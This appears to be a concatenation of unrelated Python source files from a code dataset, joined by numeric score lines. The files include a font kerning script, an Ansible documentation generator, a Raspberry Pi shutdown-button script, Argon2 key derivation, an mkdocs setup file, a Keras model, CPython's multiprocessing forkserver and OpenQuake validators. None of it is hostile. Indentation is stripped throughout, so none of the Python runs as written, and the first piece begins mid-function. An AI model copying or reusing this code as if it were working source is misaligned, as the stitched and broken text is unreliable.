masterID = Master.id
totalNumberOfDeletions = 0
print("Analyzing kerning pairs in %s ..." % Master.name)
print("1. Pairs where selected glyphs are on the left side:")
pairsToBeDeleted = []
for leftGlyphID in listOfIDs:
leftGlyphName = Font.glyphForId_( leftGlyphID ).name
try:
# print leftGlyphID, leftGlyphName, len( Font.kerning[ masterID ][ leftGlyphID ] ) #DEBUG
if leftGlyphID in Font.kerning[ masterID ]:
rightGlyphIDs = Font.kerning[ masterID ][ leftGlyphID ].keys()
numberOfPairs = len( rightGlyphIDs )
rightGlyphNames = [ Font.glyphForId_(x).name for x in rightGlyphIDs ]
totalNumberOfDeletions += numberOfPairs
print(" %s on the left: Found %i pairs ..." % ( leftGlyphName, numberOfPairs ))
#print " ".join( rightGlyphNames ) #DEBUG
pairsToBeDeleted.append( [leftGlyphName, rightGlyphNames] )
except Exception as e:
print("-- Error while processing %s (%s)" % ( leftGlyphName, e ))
print("2. Deleting these %i pairs ..." % ( totalNumberOfDeletions ))
for thisDeletionGroup in pairsToBeDeleted:
leftGlyphName = thisDeletionGroup[0]
rightGlyphNames = thisDeletionGroup[1]
for thisRightGlyphName in rightGlyphNames:
try:
Font.removeKerningForPair( masterID, leftGlyphName, thisRightGlyphName )
except Exception as e:
print("-- Error: could not delete pair %s %s (%s)" % ( leftGlyphName, thisRightGlyphName, e ))
print("3. Pairs where selected glyphs are on the right side (may take a while):")
pairsToBeDeleted = []
for leftGlyphID in Font.kerning[ masterID ].keys():
for rightGlyphID in Font.kerning[ masterID ][ leftGlyphID ].keys():
if rightGlyphID in listOfIDs:
pairsToBeDeleted.append( [ leftGlyphID, rightGlyphID ] )
print("4. Deleting these pairs ...")
for kernPair in pairsToBeDeleted:
rightGlyphName = Font.glyphForId_( kernPair[1] ).name
if kernPair[0][0] == "@":
# left glyph is a class
leftGlyphName = kernPair[0]
else:
# left glyph is a glyph
leftGlyphName = Font.glyphForId_( kernPair[0] ).name
# print " Deleting pair: %s %s ..." % ( leftGlyphName, rightGlyphName )
try:
Font.removeKerningForPair( masterID, leftGlyphName, rightGlyphName )
except Exception as e:
print("-- Error: could not delete pair %s %s (%s)" % ( leftGlyphName, rightGlyphName, e ))
totalNumberOfDeletions += ( len( pairsToBeDeleted ) )
print("Done: %i pairs deleted in %s." % ( totalNumberOfDeletions, Master.name ))
| 0.036227 |
# coding: utf-8
# Copyright: (c) 2019, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import argparse
import os.path
import pathlib
import sys
from jinja2 import Environment, FileSystemLoader
from ansible.module_utils._text import to_bytes
# Pylint doesn't understand Python3 namespace modules.
from ..change_detection import update_file_if_different # pylint: disable=relative-beyond-top-level
from ..commands import Command # pylint: disable=relative-beyond-top-level
DEFAULT_TEMPLATE_FILE = pathlib.Path(__file__).parents[4] / 'docs/templates/man.j2'
# from https://www.python.org/dev/peps/pep-0257/
def trim_docstring(docstring):
if not docstring:
return ''
# Convert tabs to spaces (following the normal Python rules)
# and split into a list of lines:
lines = docstring.expandtabs().splitlines()
# Determine minimum indentation (first line doesn't count):
indent = sys.maxsize
for line in lines[1:]:
stripped = line.lstrip()
if stripped:
indent = min(indent, len(line) - len(stripped))
# Remove indentation (first line is special):
trimmed = [lines[0].strip()]
if indent < sys.maxsize:
for line in lines[1:]:
trimmed.append(line[indent:].rstrip())
# Strip off trailing and leading blank lines:
while trimmed and not trimmed[-1]:
trimmed.pop()
while trimmed and not trimmed[0]:
trimmed.pop(0)
# Return a single string:
return '\n'.join(trimmed)
def get_options(optlist):
''' get actual options '''
opts = []
for opt in optlist:
res = {
'desc': opt.help,
'options': opt.option_strings
}
if isinstance(opt, argparse._StoreAction):
res['arg'] = opt.dest.upper()
elif not res['options']:
continue
opts.append(res)
return opts
def dedupe_groups(parser):
action_groups = []
for action_group in parser._action_groups:
found = False
for a in action_groups:
if a._actions == action_group._actions:
found = True
break
if not found:
action_groups.append(action_group)
return action_groups
def get_option_groups(option_parser):
groups = []
for action_group in dedupe_groups(option_parser)[1:]:
group_info = {}
group_info['desc'] = action_group.description
group_info['options'] = action_group._actions
group_info['group_obj'] = action_group
groups.append(group_info)
return groups
def opt_doc_list(parser):
''' iterate over options lists '''
results = []
for option_group in dedupe_groups(parser)[1:]:
results.extend(get_options(option_group._actions))
results.extend(get_options(parser._actions))
return results
# def opts_docs(cli, name):
def opts_docs(cli_class_name, cli_module_name):
''' generate doc structure from options '''
cli_name = 'ansible-%s' % cli_module_name
if cli_module_name == 'adhoc':
cli_name = 'ansible'
# WIth no action/subcommand
# shared opts set
# instantiate each cli and ask its options
cli_klass = getattr(__import__("ansible.cli.%s" % cli_module_name,
fromlist=[cli_class_name]), cli_class_name)
cli = cli_klass([cli_name])
# parse the common options
try:
cli.init_parser()
except Exception:
pass
# base/common cli info
docs = {
'cli': cli_module_name,
'cli_name': cli_name,
'usage': cli.parser.format_usage(),
'short_desc': cli.parser.description,
'long_desc': trim_docstring(cli.__doc__),
'actions': {},
'content_depth': 2,
}
option_info = {'option_names': [],
'options': [],
'groups': []}
for extras in ('ARGUMENTS'):
if hasattr(cli, extras):
docs[extras.lower()] = getattr(cli, extras)
common_opts = opt_doc_list(cli.parser)
groups_info = get_option_groups(cli.parser)
shared_opt_names = []
for opt in common_opts:
shared_opt_names.extend(opt.get('options', []))
option_info['options'] = common_opts
option_info['option_names'] = shared_opt_names
option_info['groups'].extend(groups_info)
docs.update(option_info)
# now for each action/subcommand
# force populate parser with per action options
def get_actions(parser, docs):
# use class attrs not the attrs on a instance (not that it matters here...)
try:
subparser = parser._subparsers._group_actions[0].choices
except AttributeError:
subparser = {}
depth = 0
for action, parser in subparser.items():
action_info = {'option_names': [],
'options': [],
'actions': {}}
# docs['actions'][action] = {}
# docs['actions'][action]['name'] = action
action_info['name'] = action
action_info['desc'] = trim_docstring(getattr(cli, 'execute_%s' % action).__doc__)
# docs['actions'][action]['desc'] = getattr(cli, 'execute_%s' % action).__doc__.strip()
action_doc_list = opt_doc_list(parser)
uncommon_options = []
for action_doc in action_doc_list:
# uncommon_options = []
option_aliases = action_doc.get('options', [])
for option_alias in option_aliases:
if option_alias in shared_opt_names:
continue
# TODO: use set
if option_alias not in action_info['option_names']:
action_info['option_names'].append(option_alias)
if action_doc in action_info['options']:
continue
uncommon_options.append(action_doc)
action_info['options'] = uncommon_options
depth = 1 + get_actions(parser, action_info)
docs['actions'][action] = action_info
return depth
action_depth = get_actions(cli.parser, docs)
docs['content_depth'] = action_depth + 1
docs['options'] = opt_doc_list(cli.parser)
return docs
class GenerateMan(Command):
name = 'generate-man'
@classmethod
def init_parser(cls, add_parser):
parser = add_parser(name=cls.name,
description='Generate cli documentation from cli docstrings')
parser.add_argument("-t", "--template-file", action="store", dest="template_file",
default=DEFAULT_TEMPLATE_FILE, help="path to jinja2 template")
parser.add_argument("-o", "--output-dir", action="store", dest="output_dir",
default='/tmp/', help="Output directory for rst files")
parser.add_argument("-f", "--output-format", action="store", dest="output_format",
default='man',
help="Output format for docs (the default 'man' or 'rst')")
parser.add_argument('cli_modules', help='CLI module name(s)', metavar='MODULE_NAME', nargs='*')
@staticmethod
def main(args):
template_file = args.template_file
template_path = os.path.expanduser(template_file)
template_dir = os.path.abspath(os.path.dirname(template_path))
template_basename = os.path.basename(template_file)
output_dir = os.path.abspath(args.output_dir)
output_format = args.output_format
cli_modules = args.cli_modules
# various cli parsing things checks sys.argv if the 'args' that are passed in are []
# so just remove any args so the cli modules dont try to parse them resulting in warnings
sys.argv = [sys.argv[0]]
allvars = {}
output = {}
cli_list = []
cli_bin_name_list = []
# for binary in os.listdir('../../lib/ansible/cli'):
for cli_module_name in cli_modules:
binary = os.path.basename(os.path.expanduser(cli_module_name))
if not binary.endswith('.py'):
continue
elif binary == '__init__.py':
continue
cli_name = os.path.splitext(binary)[0]
if cli_name == 'adhoc':
cli_class_name = 'AdHocCLI'
# myclass = 'AdHocCLI'
output[cli_name] = 'ansible.1.rst.in'
cli_bin_name = 'ansible'
else:
# myclass = "%sCLI" % libname.capitalize()
cli_class_name = "%sCLI" % cli_name.capitalize()
output[cli_name] = 'ansible-%s.1.rst.in' % cli_name
cli_bin_name = 'ansible-%s' % cli_name
# FIXME:
allvars[cli_name] = opts_docs(cli_class_name, cli_name)
cli_bin_name_list.append(cli_bin_name)
cli_list = allvars.keys()
doc_name_formats = {'man': '%s.1.rst.in',
'rst': '%s.rst'}
for cli_name in cli_list:
# template it!
env = Environment(loader=FileSystemLoader(template_dir))
template = env.get_template(template_basename)
# add rest to vars
tvars = allvars[cli_name]
tvars['cli_list'] = cli_list
tvars['cli_bin_name_list'] = cli_bin_name_list
tvars['cli'] = cli_name
if '-i' in tvars['options']:
print('uses inventory')
manpage = template.render(tvars)
filename = os.path.join(output_dir, doc_name_formats[output_format] % tvars['cli_name'])
update_file_if_different(filename, to_bytes(manpage))
| 0.001708 |
#!/usr/bin/python
#above line makes the system think that the program is in python
import pibrella
import time
import subprocess
presstime = 0.
def button_changed(pin):
global presstime
if pin.read() == 1:
presstime = time.time()
#print(presstime)
pibrella.light.green.on()
else:
releasetime = time.time()
timedifference = releasetime - presstime #how long the button was pressed
if timedifference < 3.:
pibrella.light.green.off() #start off with green light off
print("start pin sequence")
#start pin sequence
subprocess.call(["/home/pi/startall.sh"])
else:
pibrella.light.yellow.off() #light turns off when shutdown happens
print("Shutdown!")
#do the shutdown
#subprocess.call(["echo", "shutdown -h now"])
subprocess.call(["/usr/bin/shutdown", "-h", "now"])
def lighttransition():
global presstime
time.sleep(.1) #has the program wait
if pibrella.button.read() == 1 or pibrella.input.a.read() == 1:
#above line checks both of the buttons for changes
time.sleep(.1)
currenttime = time.time()
timedifference = currenttime - presstime
#print(timedifference, currenttime, presstime)
if timedifference > 3.: #the transition between the lights to show what is going on
pibrella.light.green.off()
pibrella.light.yellow.on()
#turns red led on to show that the program is running
pibrella.light.red.on()
pibrella.button.changed(button_changed) #calling the functions
pibrella.input.a.changed(button_changed) #has it run the button changed function when the wired button is pressed
pibrella.loop(lighttransition)
pibrella.pause()
| 0.037037 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Cryptoshop Strong file encryption.
# Encrypt and decrypt file in GCM mode with AES, Serpent or Twofish as secure as possible.
# Copyright(C) 2016 CORRAIRE Fabrice. [email protected]
# ############################################################################
# This file is part of Cryptoshop-GUI (full Qt5 gui for Cryptoshop).
#
# Cryptoshop is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Cryptoshop is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Cryptoshop. If not, see <http://www.gnu.org/licenses/>.
# ############################################################################
import argon2
from ._settings import __argon2_memory_cost__, __argon2_parallelism__, __argon2_timing_cost__
def calc_derivation(passphrase, salt):
"""
Calculate a 32 bytes key derivation with Argon2.
:param passphrase: A string of any length specified by user.
:param salt: 512 bits generated by Botan Random Number Generator.
:return: a 32 bytes keys.
"""
argonhash = argon2.low_level.hash_secret_raw((str.encode(passphrase)), salt=salt, hash_len=32,
time_cost=__argon2_timing_cost__, memory_cost=__argon2_memory_cost__,
parallelism=__argon2_parallelism__, type=argon2.low_level.Type.I)
return argonhash
def calc_derivation_formated(passphrase, salt):
"""
Calculate a 32 bytes key derivation with Argon2.
:param passphrase: A string of any length specified by user.
:param salt: 512 bits generated by Botan Random Number Generator.
:return: a 32 bytes keys.
"""
argonhash = argon2.low_level.hash_secret((str.encode(passphrase)), salt=salt, hash_len=32,
time_cost=__argon2_timing_cost__, memory_cost=__argon2_memory_cost__,
parallelism=__argon2_parallelism__, type=argon2.low_level.Type.I)
return argonhash
| 0.003215 |
import sys
import traceback
import threading
from gi.repository import GLib
from lutris.util.log import logger
class AsyncCall(threading.Thread):
def __init__(self, function, callback=None, *args, **kwargs):
"""Execute `function` in a new thread then schedule `callback` for
execution in the main loop.
"""
self.stop_request = threading.Event()
super(AsyncCall, self).__init__(target=self.target, args=args,
kwargs=kwargs)
self.function = function
self.callback = callback if callback else lambda r, e: None
self.daemon = kwargs.pop('daemon', True)
self.start()
def target(self, *args, **kwargs):
result = None
error = None
try:
result = self.function(*args, **kwargs)
except Exception as err:
logger.error("Error while completing task %s: %s",
self.function, err)
error = err
ex_type, ex_value, tb = sys.exc_info()
print(ex_type, ex_value)
traceback.print_tb(tb)
GLib.idle_add(lambda: self.callback(result, error))
| 0 |
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from op_test import OpTest
import paddle
import paddle.fluid as fluid
class TestAdamaxAPI(unittest.TestCase):
def test_adamax_api_dygraph(self):
paddle.disable_static()
value = np.arange(26).reshape(2, 13).astype("float32")
a = paddle.to_tensor(value)
linear = paddle.nn.Linear(13, 5)
adam = paddle.optimizer.Adamax(
learning_rate=0.01,
parameters=linear.parameters(),
weight_decay=0.01)
out = linear(a)
out.backward()
adam.step()
adam.clear_gradients()
def test_adamax_api(self):
place = fluid.CPUPlace()
shape = [2, 3, 8, 8]
exe = fluid.Executor(place)
train_prog = fluid.Program()
startup = fluid.Program()
with fluid.program_guard(train_prog, startup):
with fluid.unique_name.guard():
data = fluid.data(name="data", shape=shape)
conv = fluid.layers.conv2d(data, 8, 3)
loss = paddle.mean(conv)
beta1 = 0.85
beta2 = 0.95
opt = paddle.optimizer.Adamax(
learning_rate=1e-5,
beta1=beta1,
beta2=beta2,
weight_decay=0.01,
epsilon=1e-8)
opt.minimize(loss)
exe.run(startup)
data_np = np.random.random(shape).astype('float32')
rets = exe.run(train_prog, feed={"data": data_np}, fetch_list=[loss])
assert rets[0] is not None
if __name__ == "__main__":
unittest.main()
| 0 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
from setuptools import setup
import re
import os
import sys
name = 'mkdocs'
package = 'mkdocs'
description = 'Project documentation with Markdown.'
url = 'http://www.mkdocs.org'
author = 'Tom Christie'
author_email = '[email protected]'
license = 'BSD'
install_requires = [
'Jinja2>=2.7.1',
'Markdown>=2.3.1,<2.5',
'PyYAML>=3.10',
'watchdog>=0.7.0',
'ghp-import>=0.4.1'
]
long_description = (
"MkDocs is a fast, simple and downright gorgeous static site generator "
"that's geared towards building project documentation. Documentation "
"source files are written in Markdown, and configured with a single YAML "
"configuration file."
)
def get_version(package):
"""
Return package version as listed in `__version__` in `init.py`.
"""
init_py = open(os.path.join(package, '__init__.py')).read()
return re.search("^__version__ = ['\"]([^'\"]+)['\"]", init_py, re.MULTILINE).group(1)
def get_packages(package):
"""
Return root package and all sub-packages.
"""
return [dirpath
for dirpath, dirnames, filenames in os.walk(package)
if os.path.exists(os.path.join(dirpath, '__init__.py'))]
def get_package_data(package):
"""
Return all files under the root package, that are not in a
package themselves.
"""
walk = [(dirpath.replace(package + os.sep, '', 1), filenames)
for dirpath, dirnames, filenames in os.walk(package)
if not os.path.exists(os.path.join(dirpath, '__init__.py'))]
filepaths = []
for base, filenames in walk:
filepaths.extend([os.path.join(base, filename)
for filename in filenames])
return {package: filepaths}
if sys.argv[-1] == 'publish':
os.system("python setup.py sdist upload")
args = {'version': get_version(package)}
print("You probably want to also tag the version now:")
print(" git tag -a %(version)s -m 'version %(version)s'" % args)
print(" git push --tags")
sys.exit()
setup(
name=name,
version=get_version(package),
url=url,
license=license,
description=description,
long_description=long_description,
author=author,
author_email=author_email,
packages=get_packages(package),
package_data=get_package_data(package),
install_requires=install_requires,
entry_points={
'console_scripts': [
'mkdocs = mkdocs.main:run_main',
],
},
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Documentation',
'Topic :: Text Processing',
]
)
| 0.000307 |
import sys
sys.path.insert(0, "/input/") #for
sys.path.insert(0, "../common/") #for local
import common
from keras.models import Sequential
from keras.layers import *
model = Sequential()
model.add(SeparableConv2D(8, (7, 7), padding='same',
input_shape=(common.resolution_x, common.resolution_y, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(4, 4)))
model.add(SeparableConv2D(8, (5, 5), padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(SeparableConv2D(8, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(SeparableConv2D(8, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(SeparableConv2D(8, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(SeparableConv2D(8, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(SeparableConv2D(8, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(BatchNormalization())
model.add(SeparableConv2D(8, (1, 1), padding='same'))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(GlobalAveragePooling2D())
model.add(Dropout(0.5))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(2))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
common.experiment(model)
| 0.005714 |
import errno
import os
import selectors
import signal
import socket
import struct
import sys
import threading
import warnings
from . import connection
from . import process
from .context import reduction
from . import semaphore_tracker
from . import spawn
from . import util
__all__ = ['ensure_running', 'get_inherited_fds', 'connect_to_new_process',
'set_forkserver_preload']
#
#
#
MAXFDS_TO_SEND = 256
SIGNED_STRUCT = struct.Struct('q') # large enough for pid_t
#
# Forkserver class
#
class ForkServer(object):
def __init__(self):
self._forkserver_address = None
self._forkserver_alive_fd = None
self._forkserver_pid = None
self._inherited_fds = None
self._lock = threading.Lock()
self._preload_modules = ['__main__']
def set_forkserver_preload(self, modules_names):
'''Set list of module names to try to load in forkserver process.'''
if not all(type(mod) is str for mod in self._preload_modules):
raise TypeError('module_names must be a list of strings')
self._preload_modules = modules_names
def get_inherited_fds(self):
'''Return list of fds inherited from parent process.
This returns None if the current process was not started by fork
server.
'''
return self._inherited_fds
def connect_to_new_process(self, fds):
'''Request forkserver to create a child process.
Returns a pair of fds (status_r, data_w). The calling process can read
the child process's pid and (eventually) its returncode from status_r.
The calling process should write to data_w the pickled preparation and
process data.
'''
self.ensure_running()
if len(fds) + 4 >= MAXFDS_TO_SEND:
raise ValueError('too many fds')
with socket.socket(socket.AF_UNIX) as client:
client.connect(self._forkserver_address)
parent_r, child_w = os.pipe()
child_r, parent_w = os.pipe()
allfds = [child_r, child_w, self._forkserver_alive_fd,
semaphore_tracker.getfd()]
allfds += fds
try:
reduction.sendfds(client, allfds)
return parent_r, parent_w
except:
os.close(parent_r)
os.close(parent_w)
raise
finally:
os.close(child_r)
os.close(child_w)
def ensure_running(self):
'''Make sure that a fork server is running.
This can be called from any process. Note that usually a child
process will just reuse the forkserver started by its parent, so
ensure_running() will do nothing.
'''
with self._lock:
semaphore_tracker.ensure_running()
if self._forkserver_pid is not None:
# forkserver was launched before, is it still running?
pid, status = os.waitpid(self._forkserver_pid, os.WNOHANG)
if not pid:
# still alive
return
# dead, launch it again
os.close(self._forkserver_alive_fd)
self._forkserver_address = None
self._forkserver_alive_fd = None
self._forkserver_pid = None
cmd = ('from multiprocessing.forkserver import main; ' +
'main(%d, %d, %r, **%r)')
if self._preload_modules:
desired_keys = {'main_path', 'sys_path'}
data = spawn.get_preparation_data('ignore')
data = {x: y for x, y in data.items() if x in desired_keys}
else:
data = {}
with socket.socket(socket.AF_UNIX) as listener:
address = connection.arbitrary_address('AF_UNIX')
listener.bind(address)
os.chmod(address, 0o600)
listener.listen()
# all client processes own the write end of the "alive" pipe;
# when they all terminate the read end becomes ready.
alive_r, alive_w = os.pipe()
try:
fds_to_pass = [listener.fileno(), alive_r]
cmd %= (listener.fileno(), alive_r, self._preload_modules,
data)
exe = spawn.get_executable()
args = [exe] + util._args_from_interpreter_flags()
args += ['-c', cmd]
pid = util.spawnv_passfds(exe, args, fds_to_pass)
except:
os.close(alive_w)
raise
finally:
os.close(alive_r)
self._forkserver_address = address
self._forkserver_alive_fd = alive_w
self._forkserver_pid = pid
#
#
#
def main(listener_fd, alive_r, preload, main_path=None, sys_path=None):
'''Run forkserver.'''
if preload:
if '__main__' in preload and main_path is not None:
process.current_process()._inheriting = True
try:
spawn.import_main_path(main_path)
finally:
del process.current_process()._inheriting
for modname in preload:
try:
__import__(modname)
except ImportError:
pass
util._close_stdin()
sig_r, sig_w = os.pipe()
os.set_blocking(sig_r, False)
os.set_blocking(sig_w, False)
def sigchld_handler(*_unused):
# Dummy signal handler, doesn't do anything
pass
handlers = {
# unblocking SIGCHLD allows the wakeup fd to notify our event loop
signal.SIGCHLD: sigchld_handler,
# protect the process from ^C
signal.SIGINT: signal.SIG_IGN,
}
old_handlers = {sig: signal.signal(sig, val)
for (sig, val) in handlers.items()}
# calling os.write() in the Python signal handler is racy
signal.set_wakeup_fd(sig_w)
# map child pids to client fds
pid_to_fd = {}
with socket.socket(socket.AF_UNIX, fileno=listener_fd) as listener, \
selectors.DefaultSelector() as selector:
_forkserver._forkserver_address = listener.getsockname()
selector.register(listener, selectors.EVENT_READ)
selector.register(alive_r, selectors.EVENT_READ)
selector.register(sig_r, selectors.EVENT_READ)
while True:
try:
while True:
rfds = [key.fileobj for (key, events) in selector.select()]
if rfds:
break
if alive_r in rfds:
# EOF because no more client processes left
assert os.read(alive_r, 1) == b'', "Not at EOF?"
raise SystemExit
if sig_r in rfds:
# Got SIGCHLD
os.read(sig_r, 65536) # exhaust
while True:
# Scan for child processes
try:
pid, sts = os.waitpid(-1, os.WNOHANG)
except ChildProcessError:
break
if pid == 0:
break
child_w = pid_to_fd.pop(pid, None)
if child_w is not None:
if os.WIFSIGNALED(sts):
returncode = -os.WTERMSIG(sts)
else:
if not os.WIFEXITED(sts):
raise AssertionError(
"Child {0:n} status is {1:n}".format(
pid,sts))
returncode = os.WEXITSTATUS(sts)
# Send exit code to client process
try:
write_signed(child_w, returncode)
except BrokenPipeError:
# client vanished
pass
os.close(child_w)
else:
# This shouldn't happen really
warnings.warn('forkserver: waitpid returned '
'unexpected pid %d' % pid)
if listener in rfds:
# Incoming fork request
with listener.accept()[0] as s:
# Receive fds from client
fds = reduction.recvfds(s, MAXFDS_TO_SEND + 1)
if len(fds) > MAXFDS_TO_SEND:
raise RuntimeError(
"Too many ({0:n}) fds to send".format(
len(fds)))
child_r, child_w, *fds = fds
s.close()
pid = os.fork()
if pid == 0:
# Child
code = 1
try:
listener.close()
selector.close()
unused_fds = [alive_r, child_w, sig_r, sig_w]
unused_fds.extend(pid_to_fd.values())
code = _serve_one(child_r, fds,
unused_fds,
old_handlers)
except Exception:
sys.excepthook(*sys.exc_info())
sys.stderr.flush()
finally:
os._exit(code)
else:
# Send pid to client process
try:
write_signed(child_w, pid)
except BrokenPipeError:
# client vanished
pass
pid_to_fd[pid] = child_w
os.close(child_r)
for fd in fds:
os.close(fd)
except OSError as e:
if e.errno != errno.ECONNABORTED:
raise
def _serve_one(child_r, fds, unused_fds, handlers):
# close unnecessary stuff and reset signal handlers
signal.set_wakeup_fd(-1)
for sig, val in handlers.items():
signal.signal(sig, val)
for fd in unused_fds:
os.close(fd)
(_forkserver._forkserver_alive_fd,
semaphore_tracker._semaphore_tracker._fd,
*_forkserver._inherited_fds) = fds
# Run process object received over pipe
code = spawn._main(child_r)
return code
#
# Read and write signed numbers
#
def read_signed(fd):
data = b''
length = SIGNED_STRUCT.size
while len(data) < length:
s = os.read(fd, length - len(data))
if not s:
raise EOFError('unexpected EOF')
data += s
return SIGNED_STRUCT.unpack(data)[0]
def write_signed(fd, n):
msg = SIGNED_STRUCT.pack(n)
while msg:
nbytes = os.write(fd, msg)
if nbytes == 0:
raise RuntimeError('should not get here')
msg = msg[nbytes:]
#
#
#
_forkserver = ForkServer()
ensure_running = _forkserver.ensure_running
get_inherited_fds = _forkserver.get_inherited_fds
connect_to_new_process = _forkserver.connect_to_new_process
set_forkserver_preload = _forkserver.set_forkserver_preload
| 0.000594 |
"""
Acceptance test tasks
"""
from paver.easy import cmdopts, needs
from pavelib.utils.test.suites import AcceptanceTestSuite
from pavelib.utils.passthrough_opts import PassthroughTask
from optparse import make_option
try:
from pygments.console import colorize
except ImportError:
colorize = lambda color, text: text
__test__ = False # do not collect
@needs(
'pavelib.prereqs.install_prereqs',
'pavelib.utils.test.utils.clean_reports_dir',
)
@cmdopts([
("system=", "s", "System to act on"),
("default-store=", "m", "Default modulestore to use for course creation"),
("fasttest", "a", "Run without collectstatic"),
make_option("--verbose", action="store_const", const=2, dest="verbosity"),
make_option("-q", "--quiet", action="store_const", const=0, dest="verbosity"),
make_option("-v", "--verbosity", action="count", dest="verbosity"),
("default_store=", None, "deprecated in favor of default-store"),
('extra_args=', 'e', 'deprecated, pass extra options directly in the paver commandline'),
])
@PassthroughTask
def test_acceptance(options, passthrough_options):
"""
Run the acceptance tests for either lms or cms
"""
opts = {
'fasttest': getattr(options, 'fasttest', False),
'system': getattr(options, 'system', None),
'default_store': getattr(options, 'default_store', None),
'verbosity': getattr(options, 'verbosity', 3),
'extra_args': getattr(options, 'extra_args', ''),
'pdb': getattr(options, 'pdb', False),
'passthrough_options': passthrough_options,
}
if opts['system'] not in ['cms', 'lms']:
msg = colorize(
'red',
'No system specified, running tests for both cms and lms.'
)
print msg
if opts['default_store'] not in ['draft', 'split']:
msg = colorize(
'red',
'No modulestore specified, running tests for both draft and split.'
)
print msg
suite = AcceptanceTestSuite('{} acceptance'.format(opts['system']), **opts)
suite.run()
| 0.001442 |
# -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2013-2015, GEM Foundation
# OpenQuake is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# OpenQuake is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with OpenQuake. If not, see <http://www.gnu.org/licenses/>.
"""
Validation library for the engine, the desktop tools, and anything else
"""
import re
import ast
import logging
import textwrap
import collections
from decimal import Decimal
import numpy
from openquake.baselib.python3compat import with_metaclass
from openquake.hazardlib import imt, scalerel, gsim
from openquake.baselib.general import distinct
SCALEREL = scalerel.get_available_magnitude_scalerel()
GSIM = gsim.get_available_gsims()
# more tests are in tests/valid_test.py
def gsim(value, **kwargs):
"""
Make sure the given value is the name of an available GSIM class.
>>> gsim('BooreAtkinson2011')
'BooreAtkinson2011()'
"""
try:
gsim_class = GSIM[value]
except KeyError:
raise ValueError('Unknown GSIM: %s' % value)
try:
return gsim_class(**kwargs)
except TypeError:
raise ValueError('Could not instantiate %s%s' % (value, kwargs))
def compose(*validators):
"""
Implement composition of validators. For instance
>>> utf8_not_empty = compose(utf8, not_empty)
"""
def composed_validator(value):
out = value
for validator in reversed(validators):
out = validator(out)
return out
composed_validator.__name__ = 'compose(%s)' % ','.join(
val.__name__ for val in validators)
return composed_validator
class NoneOr(object):
"""
Accept the empty string (casted to None) or something else validated
by the underlying `cast` validator.
"""
def __init__(self, cast):
self.cast = cast
self.__name__ = cast.__name__
def __call__(self, value):
if value:
return self.cast(value)
class Choice(object):
"""
Check if the choice is valid (case sensitive).
"""
@property
def __name__(self):
return 'Choice%s' % str(self.choices)
def __init__(self, *choices):
self.choices = choices
def __call__(self, value):
if value not in self.choices:
raise ValueError('Got %r, expected %s' % (
value, '|'.join(self.choices)))
return value
class ChoiceCI(object):
"""
Check if the choice is valid (case insensitive version).
"""
def __init__(self, *choices):
self.choices = choices
self.__name__ = 'ChoiceCI%s' % str(choices)
def __call__(self, value):
value = value.lower()
if value not in self.choices:
raise ValueError('%r is not a valid choice in %s' % (
value, self.choices))
return value
category = ChoiceCI('population', 'buildings')
class Choices(Choice):
"""
Convert the choices, passed as a comma separated string, into a tuple
of validated strings. For instance
>>> Choices('xml', 'csv')('xml,csv')
('xml', 'csv')
"""
def __call__(self, value):
values = value.lower().split(',')
for val in values:
if val not in self.choices:
raise ValueError('%r is not a valid choice in %s' % (
val, self.choices))
return tuple(values)
export_formats = Choices('', 'xml', 'csv', 'geojson')
class Regex(object):
"""
Compare the value with the given regex
"""
def __init__(self, regex):
self.rx = re.compile(regex)
self.__name__ = 'Regex[%s]' % regex
def __call__(self, value):
if self.rx.match(value) is None:
raise ValueError('%r does not match the regex %r' %
(value, self.rx.pattern))
return value
name = Regex(r'^[a-zA-Z_]\w*$')
